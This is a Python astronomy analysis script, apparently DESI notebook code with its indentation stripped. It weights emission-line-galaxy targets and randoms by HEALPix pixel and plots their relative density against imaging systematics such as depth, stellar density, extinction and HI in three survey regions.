pixfn = '/project/projectdirs/desi/target/catalogs/dr8/0.31.1/pixweight/pixweight-dr8-0.31.1.fits'
hdr = fits.getheader(pixfn,1)
nside,nest = hdr['HPXNSIDE'],hdr['HPXNEST']
print(fits.open(pixfn)[1].columns.names)
hpq = fitsio.read(pixfn)
#get MC efficiency
mcf = fitsio.read(os.getenv('SCRATCH')+'/ELGMCeffHSCHP.fits')
mmc = np.mean(mcf['EFF'])
mcl = np.zeros(12*nside*nside)
for i in range(0,len(mcf)):
pix = mcf['HPXPIXEL'][i]
mcl[pix] = mcf['EFF'][i]/mmc
#ELGs were saved here
elgf = os.getenv('SCRATCH')+'/ELGtargetinfo.fits'
#for healpix
def radec2thphi(ra,dec):
return (-dec+90.)*np.pi/180.,ra*np.pi/180.
#read in ELGs, put them into healpix
felg = fitsio.read(elgf)
dth,dphi = radec2thphi(felg['RA'],felg['DEC'])
dpix = hp.ang2pix(nside,dth,dphi,nest)
lelg = len(felg)
print(lelg)
#full random file is available, easy to read some limited number; take 1.5x ELG to start with
rall = fitsio.read('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',rows=np.arange(int(1.5*lelg))
)
rall_header = fitsio.read_header('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',ext=1)
#cut randoms to ELG footprint
keep = (rall['NOBS_G']>0) & (rall['NOBS_R']>0) & (rall['NOBS_Z']>0)
print(len(rall[keep]))
elgbits = [1,5,6,7,11,12,13]
keepelg = keep
for bit in elgbits:
keepelg &= ((rall['MASKBITS'] & 2**bit)==0)
print(len(rall[keepelg]))
relg = rall[keepelg]
print(rall_header)
#write out randoms
#fitsio.write(os.getenv('SCRATCH')+'/ELGrandoms.fits',relg,overwrite=True)
#put randoms into healpix
rth,rphi = radec2thphi(relg['RA'],relg['DEC'])
rpix = hp.ang2pix(nside,rth,rphi,nest=nest)
#let's define split into bmzls, DECaLS North, DECaLS South (Anand has tools to make distinct DES region as well)
#one function to do directly, the other just for the indices
print(np.unique(felg['PHOTSYS']))
#bmzls = b'N' #if in desi environment
bmzls = 'N' #if in Python 3; why the difference? Maybe version of fitsio?
def splitcat(cat):
NN = cat['PHOTSYS'] == bmzls
d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)
d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)
return cat[NN],cat[d1],cat[d2]
def splitcat_ind(cat):
NN = cat['PHOTSYS'] == bmzls
d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)
d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)
return NN,d1,d2
#indices for split
dbml,ddnl,ddsl = splitcat_ind(felg)
rbml,rdnl,rdsl = splitcat_ind(relg)
print(len(felg[dbml]),len(felg[ddnl]),len(felg[ddsl]))
#put into full sky maps (probably not necessary but easier to keep straight down the line)
pixlrbm = np.zeros(12*nside*nside)
pixlgbm = np.zeros(12*nside*nside)
pixlrdn = np.zeros(12*nside*nside)
pixlgdn = np.zeros(12*nside*nside)
pixlrds = np.zeros(12*nside*nside)
pixlgds = np.zeros(12*nside*nside)
for pix in rpix[rbml]:
pixlrbm[pix] += 1.
print('randoms done')
for pix in dpix[dbml]:
pixlgbm[pix] += 1.
for pix in rpix[rdnl]:
pixlrdn[pix] += 1.
print('randoms done')
for pix in dpix[ddnl]:
pixlgdn[pix] += 1.
for pix in rpix[rdsl]:
pixlrds[pix] += 1.
print('randoms done')
for pix in dpix[ddsl]:
pixlgds[pix] += 1.
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*hpq['STARDENS']+b)
print(len(pixlgds))
def plotvshp(r1,d1,sys,rng,gdzm=20,ebvm=0.15,useMCeff=True,correctstar=False,title='',effac=1.,south=True):
w = hpq['GALDEPTH_Z'] > gdzm
w &= hpq['EBV'] < ebvm
if useMCeff:
w &= mcl > 0
if sys != 'gdc' and sys != 'rdc' and sys != 'zdc':
sm = hpq[w][sys]
else:
if sys == 'gdc':
print('g depth, extinction corrected')
sm = hpq[w]['GALDEPTH_G']*np.exp(-3.214*hpq[w]['EBV'])
if sys == 'rdc':
sm = hpq[w]['GALDEPTH_R']*np.exp(-2.165*hpq[w]['EBV'])
if sys == 'zdc':
sm = hpq[w]['GALDEPTH_Z']*np.exp(-1.211*hpq[w]['EBV'])
ds = np.ones(len(d1))
if correctstar:
ds = ws
dmc = np.ones(len(d1))
if useMCeff:
dmc = mcl**effac
hd1 = np.histogram(sm,weights=d1[w]*ds[w]/dmc[w],range=rng)
hdnoc = np.histogram(sm,weights=d1[w],bins=hd1[1],range=rng)
#print(hd1)
hr1 = np.histogram(sm,weights=r1[w],bins=hd1[1],range=rng)
#print(hr1)
xl = []
for i in range(0,len(hd1[0])):
xl.append((hd1[1][i]+hd1[1][i+1])/2.)
plt.errorbar(xl,hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])),np.sqrt(hd1[0])/hr1[0]/(lelg/len(relg)),fmt='ko')
if useMCeff:
plt.plot(xl,hdnoc[0]/hr1[0]/(sum(d1[w])/sum(r1[w])),'k--')
print(hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])))
#plt.title(str(mp)+reg)
plt.plot(xl,np.ones(len(xl)),'k:')
plt.ylabel('relative density')
plt.xlabel(sys)
plt.ylim(0.7,1.3)
plt.title(title)
plt.show()
title = 'DECaLS South'
effac=2.
plotvshp(pixlrds,pixlgds,'STARDENS',(0,0.5e4),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'PSFSIZE_G',(.9,2.5),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'PSFSIZE_Z',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'EBV',(0,0.15),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'gdc',(0,3000),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'rdc',(0,1000),title=title,effac=effac)
plotvshp(pixlrds,pixlgds,'zdc',(20,200),title=title,effac=effac)
title = 'DECaLS North'
effac=2.
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*hpq['STARDENS']+b)
cs = True
plotvshp(pixlrdn,pixlgdn,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar='')
plotvshp(pixlrdn,pixlgdn,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar='')
plotvshp(pixlrdn,pixlgdn,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrdn,pixlgdn,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)
plotvshp(pixlrdn,pixlgdn,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrdn,pixlgdn,'gdc',(0,3000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrdn,pixlgdn,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrdn,pixlgdn,'zdc',(20,200),title=title,effac=effac,correctstar=cs)
title = 'BASS/MZLS'
effac=1.
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*hpq['STARDENS']+b)
cs = True
plotvshp(pixlrbm,pixlgbm,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar='')
plotvshp(pixlrbm,pixlgbm,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)
plotvshp(pixlrbm,pixlgbm,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)
plotvshp(pixlrbm,pixlgbm,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'gdc',(0,2000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)
plotvshp(pixlrbm,pixlgbm,'zdc',(20,200),title=title,effac=effac,correctstar=cs)
'''
Below here, directly use data/randoms
'''
#Open files with grids for efficiency and define function to interpolate them (to be improved)
grids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridsouth.dat').transpose()
#grids[3] = grids[3]
gridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridnorth.dat').transpose()
#print(np.mean(gridn[3]))
#gridn[3] = gridn[3]/np.mean(gridn[3])
def interpeff(gsig,rsig,zsig,south=True):
md = 0
xg = 0.15
#if gsig > xg:
# gsig = .99*xg
xr = 0.15
#if rsig > xr:
# rsig = 0.99*xr
xz = 0.4
#if zsig > xz:
# zsig = 0.99*xz
ngp = 30
if south:
grid = grids
else:
grid = gridn
i = (ngp*gsig/(xg-md)).astype(int)
j = (ngp*rsig/(xr-md)).astype(int)
k = (ngp*zsig/(xz-md)).astype(int)
ind = (i*ngp**2.+j*ngp+k).astype(int)
#print(i,j,k,ind)
#print(grid[0][ind],grid[1][ind],grid[2][ind])
#print(grid[0][ind-1],grid[1][ind-1],grid[2][ind-1])
#print(grid[0][ind+1],grid[1][ind+1],grid[2][ind+1])
return grid[3][ind]
#print(interpeff([0.0],[0.0],[0.0],south=False))
#print(interpeff(0.0,0.0,0.0,south=True))
#print(0.1/.4)
#print(0.4/30.)
#grid[2][0]
#Get depth values that match those used for efficiency grids
depth_keyword="PSFDEPTH"
R_G=3.214 # http://legacysurvey.org/dr8/catalogs/#galactic-extinction-coefficients
R_R=2.165
R_Z=1.211
gsigmad=1./np.sqrt(felg[depth_keyword+"_G"])
rsigmad=1./np.sqrt(felg[depth_keyword+"_R"])
zsigmad=1./np.sqrt(felg[depth_keyword+"_Z"])
gsig = gsigmad*10**(0.4*R_G*felg["EBV"])
w = gsig >= 0.15
gsig[w] = 0.99*0.15
rsig = rsigmad*10**(0.4*R_R*felg["EBV"])
w = rsig >= 0.15
rsig[w] = 0.99*0.15
zsig = zsigmad*10**(0.4*R_Z*felg["EBV"])
w = zsig >= 0.4
zsig[w] = 0.99*0.4
print(min(gsig),max(gsig))
effsouthl = interpeff(gsig,rsig,zsig,south=True)
effnorthl = interpeff(gsig,rsig,zsig,south=False)
plt.hist(effnorthl,bins=100)
plt.show()
effbm = effnorthl[dbml]
print(np.mean(effbm))
effbm = effbm/np.mean(effbm)
plt.hist(effbm,bins=100)
plt.show()
effdn = effsouthl[ddnl]
print(np.mean(effdn))
effdn = effdn/np.mean(effdn)
plt.hist(effdn,bins=100)
plt.show()
#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)
#plt.colorbar()
#plt.show()
effds = effsouthl[ddsl]
print(np.mean(effds))
effds = effds/np.mean(effds)
plt.hist(effds,bins=100)
plt.show()
stardensg = np.zeros(len(felg))
print(len(felg),len(dpix))
for i in range(0,len(dpix)):
if i%1000000==0 : print(i)
pix = dpix[i]
stardensg[i] = hpq['STARDENS'][pix]
stardensr = np.zeros(len(relg))
print(len(relg),len(rpix))
for i in range(0,len(rpix)):
if i%1000000==0 : print(i)
pix = rpix[i]
stardensr[i] = hpq['STARDENS'][pix]
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,2000))
hr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#no correction
hgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])
hrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,3000))
hr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])
hrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
#no strong relation with stellar density
hg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,2000))
hr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])
hrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hrn3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_G*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,500))
hr1 = np.histogram(relg[rbml]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rbml]['EBV']),bins=hg1[1])
hgn1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,1000))
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,1000))
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_R*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,200))
hgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,200))
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,200))
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_Z*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(stardensg[dbml],weights=1./effbm,range=(0,5000))
hgn1 = np.histogram(stardensg[dbml],bins=hg1[1])
hr1 = np.histogram(stardensr[rbml],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(stardensg[ddnl],weights=1./effdn**2.,range=(0,5000))
hgn2 = np.histogram(stardensg[ddnl],bins=hg2[1])
hr2 = np.histogram(stardensr[rdnl],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(stardensg[ddsl],weights=1./effds**2.,range=(0,5000))
hgn3 = np.histogram(stardensg[ddsl],bins=hg3[1])
hr3 = np.histogram(stardensr[rdsl],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('Stellar Density')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['EBV'],weights=1./effbm*ws,range=(0,0.15))
hgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1])
hr1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['EBV'],weights=1./effdn**2.*ws,range=(0,0.15))
hgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['EBV'],weights=1./effds**2.,range=(0,0.15))
hgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('E(B-V)')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
nh1 = fits.open('NHI_HPX.fits.gz')[1].data['NHI']
#make data column
thphi = radec2thphi(felg['RA'],felg['DEC'])
r = hp.Rotator(coord=['C','G'],deg=False)
thphiG = r(thphi[0],thphi[1])
pixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])
h1g = np.zeros(len(felg))
for i in range(0,len(pixhg)):
h1g[i] = np.log(nh1[pixhg[i]])
if i%1000000==0 : print(i)
#make random column
thphi = radec2thphi(relg['RA'],relg['DEC'])
r = hp.Rotator(coord=['C','G'],deg=False)
thphiG = r(thphi[0],thphi[1])
pixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])
h1r = np.zeros(len(relg))
for i in range(0,len(pixhg)):
h1r[i] = np.log(nh1[pixhg[i]])
if i%1000000==0 : print(i)
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(h1g[dbml],weights=1./effbm*ws)
hgn1 = np.histogram(h1g[dbml],bins=hg1[1])
hr1 = np.histogram(h1r[rbml],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(h1g[ddnl],weights=1./effdn**2.*ws)
hgn2 = np.histogram(h1g[ddnl],bins=hg2[1])
hr2 = np.histogram(h1r[rdnl],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(h1g[ddsl],weights=1./effds**2.)
hgn3 = np.histogram(h1g[ddsl],bins=hg3[1])
hr3 = np.histogram(h1r[rdsl],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('ln(HI)')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
a = np.random.rand(len(relg))
w = a < 0.01
plt.plot(h1r[w],relg[w]['EBV'],'.k')
plt.show()
a,b = np.histogram(h1r,weights=relg['EBV'])
c,d = np.histogram(h1r,bins=b)
print(a)
print(c)
plt.plot(0.008*np.exp(np.array(xl3)-45.5),(a/c))
plt.plot(a/c,a/c,'--')
plt.show()
dhg = felg['EBV']-0.008*np.exp(h1g-45.5)
dhr = relg['EBV']-0.008*np.exp(h1r-45.5)
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(dhg[dbml],weights=1./effbm*ws,range=(-0.1,.15))
hgn1 = np.histogram(dhg[dbml],bins=hg1[1])
hr1 = np.histogram(dhr[rbml],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(dhg[ddnl],weights=1./effdn**2.*ws,range=(-0.1,.15))
hgn2 = np.histogram(dhg[ddnl],bins=hg2[1])
hr2 = np.histogram(dhr[rdnl],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(dhg[ddsl],weights=1./effds**2.,range=(-0.1,.15))
hgn3 = np.histogram(dhg[ddsl],bins=hg3[1])
hr3 = np.histogram(dhr[rdsl],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('diff HI EBV')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
plt.scatter(relg[w]['RA'],relg[w]['DEC'],c=dhr[w],s=.1,vmax=0.04,vmin=-0.04)
plt.colorbar()
plt.show()
wr = abs(dhr) > 0.02
wg = abs(dhg) > 0.02
print(len(relg[wr])/len(relg))
print(len(felg[wg])/len(felg))
#bmzls
w1g = ~wg & dbml
w1r = ~wr & rbml
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[w1g]+b)
wsn = 1./(slp*stardensg[dbml]+b)
effbmw = effnorthl[w1g]
